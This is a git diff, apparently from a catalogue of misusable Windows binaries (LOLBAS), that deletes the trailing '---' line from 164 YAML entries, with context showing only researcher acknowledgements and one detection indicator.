| 1 - yml/OSLibraries/Pcwutl.yml | 1 - yml/OSLibraries/Setupapi.yml | 1 - yml/OSLibraries/Shdocvw.yml | 1 - yml/OSLibraries/Shell32.yml | 1 - yml/OSLibraries/Syssetup.yml | 1 - yml/OSLibraries/Url.yml | 1 - yml/OSLibraries/Zipfldr.yml | 1 - yml/OSLibraries/comsvcs.yml | 1 - yml/OSScripts/CL_LoadAssembly.yml | 1 - yml/OSScripts/CL_mutexverifiers.yml | 1 - yml/OSScripts/Cl_invocation.yml | 1 - yml/OSScripts/Manage-bde.yml | 1 - yml/OSScripts/Pubprn.yml | 1 - yml/OSScripts/Syncappvpublishingserver.yml | 1 - yml/OSScripts/UtilityFunctions.yml | 1 - yml/OSScripts/Winrm.yml | 1 - yml/OSScripts/pester.yml | 1 - yml/OtherMSBinaries/AccCheckConsole.yml | 1 - yml/OtherMSBinaries/Adplus.yml | 1 - yml/OtherMSBinaries/Agentexecutor.yml | 1 - yml/OtherMSBinaries/Appvlp.yml | 1 - yml/OtherMSBinaries/Bginfo.yml | 1 - yml/OtherMSBinaries/Cdb.yml | 1 - yml/OtherMSBinaries/Coregen.yml | 1 - yml/OtherMSBinaries/Csi.yml | 1 - yml/OtherMSBinaries/DefaultPack.yml | 1 - yml/OtherMSBinaries/Devtoolslauncher.yml | 1 - yml/OtherMSBinaries/Dnx.yml | 1 - yml/OtherMSBinaries/Dotnet.yml | 1 - yml/OtherMSBinaries/Dump64.yml | 1 - yml/OtherMSBinaries/Dxcap.yml | 1 - yml/OtherMSBinaries/Excel.yml | 1 - yml/OtherMSBinaries/Fsi.yml | 1 - yml/OtherMSBinaries/FsiAnyCpu.yml | 1 - yml/OtherMSBinaries/Mftrace.yml | 1 - yml/OtherMSBinaries/Msdeploy.yml | 1 - yml/OtherMSBinaries/Msxsl.yml | 1 - yml/OtherMSBinaries/Ntdsutil.yml | 1 - yml/OtherMSBinaries/Powerpnt.yml | 1 - yml/OtherMSBinaries/Procdump.yml | 1 - yml/OtherMSBinaries/Rcsi.yml | 1 - yml/OtherMSBinaries/Remote.yml | 1 - yml/OtherMSBinaries/Sqldumper.yml | 1 - yml/OtherMSBinaries/Sqlps.yml | 1 - yml/OtherMSBinaries/Sqltoolsps.yml | 1 - yml/OtherMSBinaries/Squirrel.yml | 1 - yml/OtherMSBinaries/Te.yml | 1 - yml/OtherMSBinaries/Tracker.yml | 1 - yml/OtherMSBinaries/Update.yml | 1 - yml/OtherMSBinaries/VSIISExeLauncher.yml | 1 - yml/OtherMSBinaries/VisualUiaVerifyNative.yml | 1 - yml/OtherMSBinaries/Vsjitdebugger.yml | 1 - yml/OtherMSBinaries/Wfc.yml 
| 1 - yml/OtherMSBinaries/Winword.yml | 1 - yml/OtherMSBinaries/Wsl.yml | 1 - 164 files changed, 164 deletions(-) diff --git a/Archive-Old-Version/LOLUtilz/OtherBinaries/Nvudisp.yml b/Archive-Old-Version/LOLUtilz/OtherBinaries/Nvudisp.yml index 5e5b5da..d6a530b 100644 --- a/Archive-Old-Version/LOLUtilz/OtherBinaries/Nvudisp.yml +++ b/Archive-Old-Version/LOLUtilz/OtherBinaries/Nvudisp.yml @@ -25,4 +25,3 @@ Resources: Acknowledgement: - Person: Pierre-Alexandre Braeken Handle: '@pabraeken' ---- diff --git a/Archive-Old-Version/LOLUtilz/OtherBinaries/RunCmd_X64.yml b/Archive-Old-Version/LOLUtilz/OtherBinaries/RunCmd_X64.yml index a95c37f..50c121b 100644 --- a/Archive-Old-Version/LOLUtilz/OtherBinaries/RunCmd_X64.yml +++ b/Archive-Old-Version/LOLUtilz/OtherBinaries/RunCmd_X64.yml @@ -23,4 +23,3 @@ Resources: Acknowledgement: - Person: Bart Handle: '@bartblaze' ---- diff --git a/Archive-Old-Version/LOLUtilz/OtherBinaries/Upload.yml b/Archive-Old-Version/LOLUtilz/OtherBinaries/Upload.yml index c6b5dc5..929443e 100644 --- a/Archive-Old-Version/LOLUtilz/OtherBinaries/Upload.yml +++ b/Archive-Old-Version/LOLUtilz/OtherBinaries/Upload.yml @@ -15,4 +15,3 @@ Full_Path: - Path: '%localappdata%\Whatsapp\Update.exe' Detection: - IOC: '"%localappdata%\Whatsapp\Update.exe" spawned an unknown process' ---- diff --git a/Archive-Old-Version/LOLUtilz/OtherMSBinaries/Winword.yml b/Archive-Old-Version/LOLUtilz/OtherMSBinaries/Winword.yml index 2a93285..0ca821f 100644 --- a/Archive-Old-Version/LOLUtilz/OtherMSBinaries/Winword.yml +++ b/Archive-Old-Version/LOLUtilz/OtherMSBinaries/Winword.yml @@ -25,4 +25,3 @@ Acknowledgement: Handle: '@@vysecurity' - Person: Adam (Internals) Handle: '@Hexacorn' ---- diff --git a/yml/OSBinaries/AppInstaller.yml b/yml/OSBinaries/AppInstaller.yml index a7aa5b5..df1e405 100644 --- a/yml/OSBinaries/AppInstaller.yml +++ b/yml/OSBinaries/AppInstaller.yml @@ -20,4 +20,3 @@ Resources: Acknowledgement: - Person: Wade Hickey Handle: '@notwhickey' ---- 
diff --git a/yml/OSBinaries/Aspnet_Compiler.yml b/yml/OSBinaries/Aspnet_Compiler.yml index dc4cf74..ee23cf7 100644 --- a/yml/OSBinaries/Aspnet_Compiler.yml +++ b/yml/OSBinaries/Aspnet_Compiler.yml @@ -25,4 +25,3 @@ Resources: Acknowledgement: - Person: cpl Handle: '@cpl3h' ---- diff --git a/yml/OSBinaries/At.yml b/yml/OSBinaries/At.yml index c0b81bd..245153c 100644 --- a/yml/OSBinaries/At.yml +++ b/yml/OSBinaries/At.yml @@ -34,4 +34,3 @@ Acknowledgement: Handle: - Person: 'Xabier Ugarte-Pedrero' Handle: ---- diff --git a/yml/OSBinaries/Atbroker.yml b/yml/OSBinaries/Atbroker.yml index 45ffc5f..78a9e50 100644 --- a/yml/OSBinaries/Atbroker.yml +++ b/yml/OSBinaries/Atbroker.yml @@ -27,4 +27,3 @@ Resources: Acknowledgement: - Person: Adam Handle: '@hexacorn' ---- diff --git a/yml/OSBinaries/Bash.yml b/yml/OSBinaries/Bash.yml index 338a5d8..1a3a7b9 100644 --- a/yml/OSBinaries/Bash.yml +++ b/yml/OSBinaries/Bash.yml @@ -48,4 +48,3 @@ Acknowledgement: Handle: '@aionescu' - Person: Asif Matadar Handle: '@d1r4c' ---- diff --git a/yml/OSBinaries/Bitsadmin.yml b/yml/OSBinaries/Bitsadmin.yml index 9a6f56b..01a868b 100644 --- a/yml/OSBinaries/Bitsadmin.yml +++ b/yml/OSBinaries/Bitsadmin.yml @@ -56,4 +56,3 @@ Acknowledgement: Handle: '@carnal0wnage' - Person: Oddvar Moe Handle: '@oddvarmoe' ---- diff --git a/yml/OSBinaries/Certoc.yml b/yml/OSBinaries/Certoc.yml index eb2328d..fc183f6 100644 --- a/yml/OSBinaries/Certoc.yml +++ b/yml/OSBinaries/Certoc.yml @@ -34,4 +34,3 @@ Resources: Acknowledgement: - Person: Ensar Samil Handle: '@sblmsrsn' ---- diff --git a/yml/OSBinaries/Certreq.yml b/yml/OSBinaries/Certreq.yml index 2d60a37..5f42615 100644 --- a/yml/OSBinaries/Certreq.yml +++ b/yml/OSBinaries/Certreq.yml @@ -32,4 +32,3 @@ Resources: Acknowledgement: - Person: David Middlehurst Handle: '@dtmsecurity' ---- diff --git a/yml/OSBinaries/Certutil.yml b/yml/OSBinaries/Certutil.yml index be67802..2f937a5 100644 --- a/yml/OSBinaries/Certutil.yml +++ b/yml/OSBinaries/Certutil.yml 
@@ -75,4 +75,3 @@ Acknowledgement: - Person: egre55 Handle: '@egre55' - Person: Lior Adar ---- diff --git a/yml/OSBinaries/Cmd.yml b/yml/OSBinaries/Cmd.yml index c67db32..2ef701c 100644 --- a/yml/OSBinaries/Cmd.yml +++ b/yml/OSBinaries/Cmd.yml @@ -34,4 +34,3 @@ Resources: Acknowledgement: - Person: r0lan Handle: '@yeyint_mth' ---- diff --git a/yml/OSBinaries/Cmdkey.yml b/yml/OSBinaries/Cmdkey.yml index 90ef75d..8c28840 100644 --- a/yml/OSBinaries/Cmdkey.yml +++ b/yml/OSBinaries/Cmdkey.yml @@ -24,4 +24,3 @@ Resources: Acknowledgement: - Person: Handle: ---- diff --git a/yml/OSBinaries/Cmdl32.yml b/yml/OSBinaries/Cmdl32.yml index 275827c..47a87c9 100644 --- a/yml/OSBinaries/Cmdl32.yml +++ b/yml/OSBinaries/Cmdl32.yml @@ -23,4 +23,3 @@ Resources: Acknowledgement: - Person: Elliot Killick Handle: '@elliotkillick' ---- diff --git a/yml/OSBinaries/Cmstp.yml b/yml/OSBinaries/Cmstp.yml index 0f00d4e..247a27c 100644 --- a/yml/OSBinaries/Cmstp.yml +++ b/yml/OSBinaries/Cmstp.yml @@ -44,4 +44,3 @@ Acknowledgement: Handle: '@oddvarmoe' - Person: Nick Tyrer Handle: '@NickTyrer' ---- diff --git a/yml/OSBinaries/ConfigSecurityPolicy.yml b/yml/OSBinaries/ConfigSecurityPolicy.yml index 286db84..a433c69 100644 --- a/yml/OSBinaries/ConfigSecurityPolicy.yml +++ b/yml/OSBinaries/ConfigSecurityPolicy.yml @@ -29,4 +29,3 @@ Resources: Acknowledgement: - Person: Ialle Teixeira Handle: '@NtSetDefault' ---- diff --git a/yml/OSBinaries/Conhost.yml b/yml/OSBinaries/Conhost.yml index 0ed5c87..cc27bc7 100644 --- a/yml/OSBinaries/Conhost.yml +++ b/yml/OSBinaries/Conhost.yml @@ -24,4 +24,3 @@ Acknowledgement: Handle: '@hexacorn' - Person: Wietze Handle: '@wietze' ---- diff --git a/yml/OSBinaries/Control.yml b/yml/OSBinaries/Control.yml index 148aa25..6e71918 100644 --- a/yml/OSBinaries/Control.yml +++ b/yml/OSBinaries/Control.yml @@ -34,4 +34,3 @@ Resources: Acknowledgement: - Person: Jimmy Handle: '@bohops' ---- 
diff --git a/yml/OSBinaries/Csc.yml b/yml/OSBinaries/Csc.yml index 44d7da9..df6421b 100644 --- a/yml/OSBinaries/Csc.yml +++ b/yml/OSBinaries/Csc.yml @@ -34,4 +34,3 @@ Resources: Acknowledgement: - Person: Handle: ---- diff --git a/yml/OSBinaries/Cscript.yml b/yml/OSBinaries/Cscript.yml index 7a09cee..3915a36 100644 --- a/yml/OSBinaries/Cscript.yml +++ b/yml/OSBinaries/Cscript.yml @@ -33,4 +33,3 @@ Resources: Acknowledgement: - Person: Oddvar Moe Handle: '@oddvarmoe' ---- diff --git a/yml/OSBinaries/DataSvcUtil.yml b/yml/OSBinaries/DataSvcUtil.yml index e5d5c20..d4a7935 100644 --- a/yml/OSBinaries/DataSvcUtil.yml +++ b/yml/OSBinaries/DataSvcUtil.yml @@ -27,4 +27,3 @@ Resources: Acknowledgement: - Person: Ialle Teixeira Handle: '@NtSetDefault' ---- diff --git a/yml/OSBinaries/Desktopimgdownldr.yml b/yml/OSBinaries/Desktopimgdownldr.yml index 46fc551..439948a 100644 --- a/yml/OSBinaries/Desktopimgdownldr.yml +++ b/yml/OSBinaries/Desktopimgdownldr.yml @@ -26,4 +26,3 @@ Resources: Acknowledgement: - Person: Gal Kristal Handle: '@gal_kristal' ---- diff --git a/yml/OSBinaries/Dfsvc.yml b/yml/OSBinaries/Dfsvc.yml index 075e45a..15988e1 100644 --- a/yml/OSBinaries/Dfsvc.yml +++ b/yml/OSBinaries/Dfsvc.yml @@ -26,4 +26,3 @@ Resources: Acknowledgement: - Person: Casey Smith Handle: '@subtee' ---- diff --git a/yml/OSBinaries/Diantz.yml b/yml/OSBinaries/Diantz.yml index ab75e5d..18d1979 100644 --- a/yml/OSBinaries/Diantz.yml +++ b/yml/OSBinaries/Diantz.yml @@ -35,4 +35,3 @@ Acknowledgement: Handle: '@tim8288' - Person: Hai Vaknin Handle: '@vakninhai' ---- diff --git a/yml/OSBinaries/Diskshadow.yml b/yml/OSBinaries/Diskshadow.yml index c9ba246..496f340 100644 --- a/yml/OSBinaries/Diskshadow.yml +++ b/yml/OSBinaries/Diskshadow.yml @@ -33,4 +33,3 @@ Resources: Acknowledgement: - Person: Jimmy Handle: '@bohops' ---- diff --git a/yml/OSBinaries/Dnscmd.yml b/yml/OSBinaries/Dnscmd.yml index 64703cb..96c1ead 100644 --- a/yml/OSBinaries/Dnscmd.yml +++ b/yml/OSBinaries/Dnscmd.yml 
@@ -32,4 +32,3 @@ Acknowledgement:
 Handle: '@dim0x69'
 - Person: Nikhil SamratAshok
 Handle: '@nikhil_mitt'
----
diff --git a/yml/OSBinaries/Esentutl.yml b/yml/OSBinaries/Esentutl.yml
index 6a3656a..6766bba 100644
--- a/yml/OSBinaries/Esentutl.yml
+++ b/yml/OSBinaries/Esentutl.yml
@@ -67,4 +67,3 @@ Acknowledgement:
 Handle: '@egre55'
 - Person: Mike Cary
 Handle: 'grayfold3d'
----
diff --git a/yml/OSBinaries/Eventvwr.yml b/yml/OSBinaries/Eventvwr.yml
index 2d5413d..f2ca7e4 100644
--- a/yml/OSBinaries/Eventvwr.yml
+++ b/yml/OSBinaries/Eventvwr.yml
@@ -31,4 +31,3 @@ Acknowledgement:
 Handle: '@enigma0x3'
 - Person: Matt Graeber
 Handle: '@mattifestation'
----
diff --git a/yml/OSBinaries/Expand.yml b/yml/OSBinaries/Expand.yml
index 4574fe4..7921d6a 100644
--- a/yml/OSBinaries/Expand.yml
+++ b/yml/OSBinaries/Expand.yml
@@ -41,4 +41,3 @@ Acknowledgement:
 Handle: '@infosecn1nja'
 - Person: Oddvar Moe
 Handle: '@oddvarmoe'
----
diff --git a/yml/OSBinaries/Explorer.yml b/yml/OSBinaries/Explorer.yml
index b38d467..60deb15 100644
--- a/yml/OSBinaries/Explorer.yml
+++ b/yml/OSBinaries/Explorer.yml
@@ -37,4 +37,3 @@ Acknowledgement:
 Handle: '@CyberRaiju'
 - Person: Jimmy
 Handle: '@bohops'
----
diff --git a/yml/OSBinaries/Extexport.yml b/yml/OSBinaries/Extexport.yml
index 0b61161..a4a1519 100644
--- a/yml/OSBinaries/Extexport.yml
+++ b/yml/OSBinaries/Extexport.yml
@@ -24,4 +24,3 @@ Resources:
 Acknowledgement:
 - Person: Adam
 Handle: '@hexacorn'
----
diff --git a/yml/OSBinaries/Extrac32.yml b/yml/OSBinaries/Extrac32.yml
index 4682e7c..eb682d0 100644
--- a/yml/OSBinaries/Extrac32.yml
+++ b/yml/OSBinaries/Extrac32.yml
@@ -54,4 +54,3 @@ Acknowledgement:
 Handle: '@VakninHai'
 - Person: Tamir Yehuda
 Handle: '@tim8288'
----
diff --git a/yml/OSBinaries/Findstr.yml b/yml/OSBinaries/Findstr.yml
index 22fcbb0..f3f67cd 100644
--- a/yml/OSBinaries/Findstr.yml
+++ b/yml/OSBinaries/Findstr.yml
@@ -45,4 +45,3 @@ Resources:
 Acknowledgement:
 - Person: Oddvar Moe
 Handle: '@oddvarmoe'
----
diff --git a/yml/OSBinaries/Finger.yml b/yml/OSBinaries/Finger.yml
index e84d9d9..4627f7c 100644
--- a/yml/OSBinaries/Finger.yml
+++ b/yml/OSBinaries/Finger.yml
@@ -28,4 +28,3 @@ Acknowledgement:
 Handle: '@Ocelotty6669'
 - Person: Malwrologist
 Handle: '@DissectMalware'
----
diff --git a/yml/OSBinaries/FltMC.yml b/yml/OSBinaries/FltMC.yml
index 8717c5b..bcc8caf 100644
--- a/yml/OSBinaries/FltMC.yml
+++ b/yml/OSBinaries/FltMC.yml
@@ -25,4 +25,3 @@ Resources:
 Acknowledgement:
 - Person: Carlos Perez
 Handle: '@Carlos_Perez'
----
diff --git a/yml/OSBinaries/Forfiles.yml b/yml/OSBinaries/Forfiles.yml
index b8761ad..8ccac01 100644
--- a/yml/OSBinaries/Forfiles.yml
+++ b/yml/OSBinaries/Forfiles.yml
@@ -34,4 +34,3 @@ Acknowledgement:
 Handle: '@vector_sec'
 - Person: Oddvar Moe
 Handle: '@oddvarmoe'
----
diff --git a/yml/OSBinaries/Ftp.yml b/yml/OSBinaries/Ftp.yml
index c41136e..8f2f35b 100644
--- a/yml/OSBinaries/Ftp.yml
+++ b/yml/OSBinaries/Ftp.yml
@@ -38,4 +38,3 @@ Acknowledgement:
 Handle: ''
 - Person: Amit Serper
 Handle: '@0xAmit '
----
diff --git a/yml/OSBinaries/GfxDownloadWrapper.yml b/yml/OSBinaries/GfxDownloadWrapper.yml
index bd3ec8f..9675000 100644
--- a/yml/OSBinaries/GfxDownloadWrapper.yml
+++ b/yml/OSBinaries/GfxDownloadWrapper.yml
@@ -176,4 +176,3 @@ Resources:
 Acknowledgement:
 - Person: Jesus Galvez
 Handle:
----
diff --git a/yml/OSBinaries/Gpscript.yml b/yml/OSBinaries/Gpscript.yml
index 22ecd6a..ef8076e 100644
--- a/yml/OSBinaries/Gpscript.yml
+++ b/yml/OSBinaries/Gpscript.yml
@@ -32,4 +32,3 @@ Resources:
 Acknowledgement:
 - Person: Oddvar Moe
 Handle: '@oddvarmoe'
----
diff --git a/yml/OSBinaries/Hh.yml b/yml/OSBinaries/Hh.yml
index ad15db6..bbf28b8 100644
--- a/yml/OSBinaries/Hh.yml
+++ b/yml/OSBinaries/Hh.yml
@@ -35,4 +35,3 @@ Resources:
 Acknowledgement:
 - Person: Oddvar Moe
 Handle: '@oddvarmoe'
----
diff --git a/yml/OSBinaries/IMEWDBLD.yml b/yml/OSBinaries/IMEWDBLD.yml
index 2199ed5..806f00b 100644
--- a/yml/OSBinaries/IMEWDBLD.yml
+++ b/yml/OSBinaries/IMEWDBLD.yml
@@ -20,4 +20,3 @@ Resources:
 Acknowledgement:
 - Person: Wade Hickey
 Handle: '@notwhickey'
----
diff --git a/yml/OSBinaries/Ie4uinit.yml b/yml/OSBinaries/Ie4uinit.yml
index f5a9e3d..931710b 100644
--- a/yml/OSBinaries/Ie4uinit.yml
+++ b/yml/OSBinaries/Ie4uinit.yml
@@ -27,4 +27,3 @@ Resources:
 Acknowledgement:
 - Person: Jimmy
 Handle: '@bohops'
----
diff --git a/yml/OSBinaries/Ieexec.yml b/yml/OSBinaries/Ieexec.yml
index aa591b1..c14b4a3 100644
--- a/yml/OSBinaries/Ieexec.yml
+++ b/yml/OSBinaries/Ieexec.yml
@@ -34,4 +34,3 @@ Resources:
 Acknowledgement:
 - Person: Casey Smith
 Handle: '@subtee'
----
diff --git a/yml/OSBinaries/Ilasm.yml b/yml/OSBinaries/Ilasm.yml
index 98bf87c..d7187bd 100644
--- a/yml/OSBinaries/Ilasm.yml
+++ b/yml/OSBinaries/Ilasm.yml
@@ -32,4 +32,3 @@ Acknowledgement:
 Handle: '@VakninHai'
 - Person: Lior Adar
 Handle:
----
diff --git a/yml/OSBinaries/Infdefaultinstall.yml b/yml/OSBinaries/Infdefaultinstall.yml
index 894317c..c24b389 100644
--- a/yml/OSBinaries/Infdefaultinstall.yml
+++ b/yml/OSBinaries/Infdefaultinstall.yml
@@ -26,4 +26,3 @@ Resources:
 Acknowledgement:
 - Person: Kyle Hanslovan
 Handle: '@kylehanslovan'
----
diff --git a/yml/OSBinaries/Installutil.yml b/yml/OSBinaries/Installutil.yml
index 4314b56..57d563b 100644
--- a/yml/OSBinaries/Installutil.yml
+++ b/yml/OSBinaries/Installutil.yml
@@ -39,4 +39,3 @@ Resources:
 Acknowledgement:
 - Person: Casey Smith
 Handle: '@subtee'
----
diff --git a/yml/OSBinaries/Jsc.yml b/yml/OSBinaries/Jsc.yml
index 9e2af4a..bb1d012 100644
--- a/yml/OSBinaries/Jsc.yml
+++ b/yml/OSBinaries/Jsc.yml
@@ -34,4 +34,3 @@ Resources:
 Acknowledgement:
 - Person: Malwrologist
 Handle: '@DissectMalware'
----
diff --git a/yml/OSBinaries/Makecab.yml b/yml/OSBinaries/Makecab.yml
index 7776867..40a8e0c 100644
--- a/yml/OSBinaries/Makecab.yml
+++ b/yml/OSBinaries/Makecab.yml
@@ -40,4 +40,3 @@ Resources:
 Acknowledgement:
 - Person: Oddvar Moe
 Handle: '@oddvarmoe'
----
diff --git a/yml/OSBinaries/Mavinject.yml b/yml/OSBinaries/Mavinject.yml
index a713768..1a184d3 100644
--- a/yml/OSBinaries/Mavinject.yml
+++ b/yml/OSBinaries/Mavinject.yml
@@ -36,4 +36,3 @@ Acknowledgement:
 Handle: '@gN3mes1s'
 - Person: Oddvar Moe
 Handle: '@oddvarmoe'
----
diff --git a/yml/OSBinaries/Microsoft.Workflow.Compiler.yml b/yml/OSBinaries/Microsoft.Workflow.Compiler.yml
index 5d1f884..beaf2c0 100644
--- a/yml/OSBinaries/Microsoft.Workflow.Compiler.yml
+++ b/yml/OSBinaries/Microsoft.Workflow.Compiler.yml
@@ -56,4 +56,3 @@ Acknowledgement:
 Handle: '@FortyNorthSec'
 - Person: Bank Security
 Handle: '@Bank_Security'
----
diff --git a/yml/OSBinaries/Mmc.yml b/yml/OSBinaries/Mmc.yml
index 4bf70e8..c03a606 100644
--- a/yml/OSBinaries/Mmc.yml
+++ b/yml/OSBinaries/Mmc.yml
@@ -34,4 +34,3 @@ Acknowledgement:
 Handle: '@bohops'
 - Person: clem
 Handle: '@clavoillotte'
----
diff --git a/yml/OSBinaries/MpCmdRun.yml b/yml/OSBinaries/MpCmdRun.yml
index 33ac149..1707ea6 100644
--- a/yml/OSBinaries/MpCmdRun.yml
+++ b/yml/OSBinaries/MpCmdRun.yml
@@ -53,4 +53,3 @@ Acknowledgement:
 Handle: ''
 - Person: Cedric
 Handle: '@th3c3dr1c'
----
diff --git a/yml/OSBinaries/Msbuild.yml b/yml/OSBinaries/Msbuild.yml
index abb2597..237c6cb 100644
--- a/yml/OSBinaries/Msbuild.yml
+++ b/yml/OSBinaries/Msbuild.yml
@@ -77,4 +77,3 @@ Acknowledgement:
 Handle: '@Cneelis'
 - Person: Jimmy
 Handle: '@bohops'
----
diff --git a/yml/OSBinaries/Msconfig.yml b/yml/OSBinaries/Msconfig.yml
index 6b59858..c4ce1c1 100644
--- a/yml/OSBinaries/Msconfig.yml
+++ b/yml/OSBinaries/Msconfig.yml
@@ -24,4 +24,3 @@ Resources:
 Acknowledgement:
 - Person: Pierre-Alexandre Braeken
 Handle: '@pabraeken'
----
diff --git a/yml/OSBinaries/Msdt.yml b/yml/OSBinaries/Msdt.yml
index 7f65131..d8966f0 100644
--- a/yml/OSBinaries/Msdt.yml
+++ b/yml/OSBinaries/Msdt.yml
@@ -33,4 +33,3 @@ Resources:
 Acknowledgement:
 - Person:
 Handle:
----
diff --git a/yml/OSBinaries/Mshta.yml b/yml/OSBinaries/Mshta.yml
index 2f68ca7..43717d7 100644
--- a/yml/OSBinaries/Mshta.yml
+++ b/yml/OSBinaries/Mshta.yml
@@ -69,4 +69,3 @@ Acknowledgement:
 Handle: '@subtee'
 - Person: Oddvar Moe
 Handle: '@oddvarmoe'
----
diff --git a/yml/OSBinaries/Msiexec.yml b/yml/OSBinaries/Msiexec.yml
index c9bc676..12722c9 100644
--- a/yml/OSBinaries/Msiexec.yml
+++ b/yml/OSBinaries/Msiexec.yml
@@ -51,4 +51,3 @@ Acknowledgement:
 Handle: '@netbiosX'
 - Person: Philip Tsukerman
 Handle: '@PhilipTsukerman'
----
diff --git a/yml/OSBinaries/Netsh.yml b/yml/OSBinaries/Netsh.yml
index b8f459c..b004ed2 100644
--- a/yml/OSBinaries/Netsh.yml
+++ b/yml/OSBinaries/Netsh.yml
@@ -34,4 +34,3 @@ Acknowledgement:
 Handle:
 - Person: 'Xabier Ugarte-Pedrero'
 Handle:
----
diff --git a/yml/OSBinaries/Odbcconf.yml b/yml/OSBinaries/Odbcconf.yml
index 7163688..c750fc0 100644
--- a/yml/OSBinaries/Odbcconf.yml
+++ b/yml/OSBinaries/Odbcconf.yml
@@ -36,4 +36,3 @@ Acknowledgement:
 Handle: '@subtee'
 - Person: Adam
 Handle: '@Hexacorn'
----
diff --git a/yml/OSBinaries/OfflineScannerShell.yml b/yml/OSBinaries/OfflineScannerShell.yml
index fd85398..bcb0ad9 100644
--- a/yml/OSBinaries/OfflineScannerShell.yml
+++ b/yml/OSBinaries/OfflineScannerShell.yml
@@ -19,4 +19,3 @@ Detection:
 Acknowledgement:
 - Person: Elliot Killick
 Handle: '@elliotkillick'
----
diff --git a/yml/OSBinaries/OneDriveStandaloneUpdater.yml b/yml/OSBinaries/OneDriveStandaloneUpdater.yml
index b61a6e8..f49529e 100644
--- a/yml/OSBinaries/OneDriveStandaloneUpdater.yml
+++ b/yml/OSBinaries/OneDriveStandaloneUpdater.yml
@@ -21,4 +21,3 @@ Resources:
 Acknowledgement:
 - Person: Elliot Killick
 Handle: '@elliotkillick'
----
diff --git a/yml/OSBinaries/Pcalua.yml b/yml/OSBinaries/Pcalua.yml
index e61cf7b..be79c37 100644
--- a/yml/OSBinaries/Pcalua.yml
+++ b/yml/OSBinaries/Pcalua.yml
@@ -38,4 +38,3 @@ Acknowledgement:
 Handle: '@kylehanslovan'
 - Person: Fab
 Handle: '@0rbz_'
----
diff --git a/yml/OSBinaries/Pcwrun.yml b/yml/OSBinaries/Pcwrun.yml
index e1bdc30..3bab933 100644
--- a/yml/OSBinaries/Pcwrun.yml
+++ b/yml/OSBinaries/Pcwrun.yml
@@ -22,4 +22,3 @@ Resources:
 Acknowledgement:
 - Person: Pierre-Alexandre Braeken
 Handle: '@pabraeken'
----
diff --git a/yml/OSBinaries/Pktmon.yml b/yml/OSBinaries/Pktmon.yml
index 3a0e4af..99b89a6 100644
--- a/yml/OSBinaries/Pktmon.yml
+++ b/yml/OSBinaries/Pktmon.yml
@@ -31,4 +31,3 @@ Resources:
 Acknowledgement:
 - Person: Derek Johnson
 Handle: ''
----
diff --git a/yml/OSBinaries/Pnputil.yml b/yml/OSBinaries/Pnputil.yml
index 512ae99..d2ae315 100644
--- a/yml/OSBinaries/Pnputil.yml
+++ b/yml/OSBinaries/Pnputil.yml
@@ -22,4 +22,3 @@ Acknowledgement:
 Handle: '@LuxNoBulIshit'
 - Person: Avihay eldad
 Handle: '@aloneliassaf'
----
diff --git a/yml/OSBinaries/Presentationhost.yml b/yml/OSBinaries/Presentationhost.yml
index c5deac3..957ae44 100644
--- a/yml/OSBinaries/Presentationhost.yml
+++ b/yml/OSBinaries/Presentationhost.yml
@@ -25,4 +25,3 @@ Resources:
 Acknowledgement:
 - Person: Casey Smith
 Handle: '@subtee'
----
diff --git a/yml/OSBinaries/Print.yml b/yml/OSBinaries/Print.yml
index ed0405a..215a6e9 100644
--- a/yml/OSBinaries/Print.yml
+++ b/yml/OSBinaries/Print.yml
@@ -40,4 +40,3 @@ Resources:
 Acknowledgement:
 - Person: Oddvar Moe
 Handle: '@oddvarmoe'
----
diff --git a/yml/OSBinaries/PrintBrm.yml b/yml/OSBinaries/PrintBrm.yml
index 8dec4db..634c49d 100644
--- a/yml/OSBinaries/PrintBrm.yml
+++ b/yml/OSBinaries/PrintBrm.yml
@@ -28,4 +28,3 @@ Resources:
 Acknowledgement:
 - Person: Elliot Killick
 Handle: '@elliotkillick'
----
diff --git a/yml/OSBinaries/Psr.yml b/yml/OSBinaries/Psr.yml
index ba36c95..56b9bd6 100644
--- a/yml/OSBinaries/Psr.yml
+++ b/yml/OSBinaries/Psr.yml
@@ -25,4 +25,3 @@ Resources:
 Acknowledgement:
 - Person: Leon Rodenko
 Handle: '@L3m0nada'
----
diff --git a/yml/OSBinaries/Rasautou.yml b/yml/OSBinaries/Rasautou.yml
index 0caf9b6..459d579 100644
--- a/yml/OSBinaries/Rasautou.yml
+++ b/yml/OSBinaries/Rasautou.yml
@@ -24,4 +24,3 @@ Resources:
 Acknowledgement:
 - Person: FireEye
 Handle: '@FireEye'
----
diff --git a/yml/OSBinaries/Rdrleakdiag.yml b/yml/OSBinaries/Rdrleakdiag.yml
index dedb202..77b13a0 100644
--- a/yml/OSBinaries/Rdrleakdiag.yml
+++ b/yml/OSBinaries/Rdrleakdiag.yml
@@ -41,4 +41,3 @@ Resources:
 Acknowledgement:
 - Person: Grzegorz Tworek
 Handle: '@0gtweet'
----
\ No newline at end of file
diff --git a/yml/OSBinaries/Reg.yml b/yml/OSBinaries/Reg.yml
index 3e0443b..b48e146 100644
--- a/yml/OSBinaries/Reg.yml
+++ b/yml/OSBinaries/Reg.yml
@@ -36,4 +36,3 @@ Resources:
 Acknowledgement:
 - Person: Oddvar Moe
 Handle: '@oddvarmoe'
----
diff --git a/yml/OSBinaries/Regasm.yml b/yml/OSBinaries/Regasm.yml
index 5aa2b44..be27c04 100644
--- a/yml/OSBinaries/Regasm.yml
+++ b/yml/OSBinaries/Regasm.yml
@@ -38,4 +38,3 @@ Resources:
 Acknowledgement:
 - Person: Casey Smith
 Handle: '@subtee'
----
diff --git a/yml/OSBinaries/Regedit.yml b/yml/OSBinaries/Regedit.yml
index 3febc17..4ea0657 100644
--- a/yml/OSBinaries/Regedit.yml
+++ b/yml/OSBinaries/Regedit.yml
@@ -32,4 +32,3 @@ Resources:
 Acknowledgement:
 - Person: Oddvar Moe
 Handle: '@oddvarmoe'
----
diff --git a/yml/OSBinaries/Regini.yml b/yml/OSBinaries/Regini.yml
index a19af48..717ddc5 100644
--- a/yml/OSBinaries/Regini.yml
+++ b/yml/OSBinaries/Regini.yml
@@ -25,4 +25,3 @@ Resources:
 Acknowledgement:
 - Person: Eli Salem
 Handle: '@elisalem9'
----
diff --git a/yml/OSBinaries/Register-cimprovider.yml b/yml/OSBinaries/Register-cimprovider.yml
index f3a98f2..df1653b 100644
--- a/yml/OSBinaries/Register-cimprovider.yml
+++ b/yml/OSBinaries/Register-cimprovider.yml
@@ -24,4 +24,3 @@ Resources:
 Acknowledgement:
 - Person: Philip Tsukerman
 Handle: '@PhilipTsukerman'
----
diff --git a/yml/OSBinaries/Regsvcs.yml b/yml/OSBinaries/Regsvcs.yml
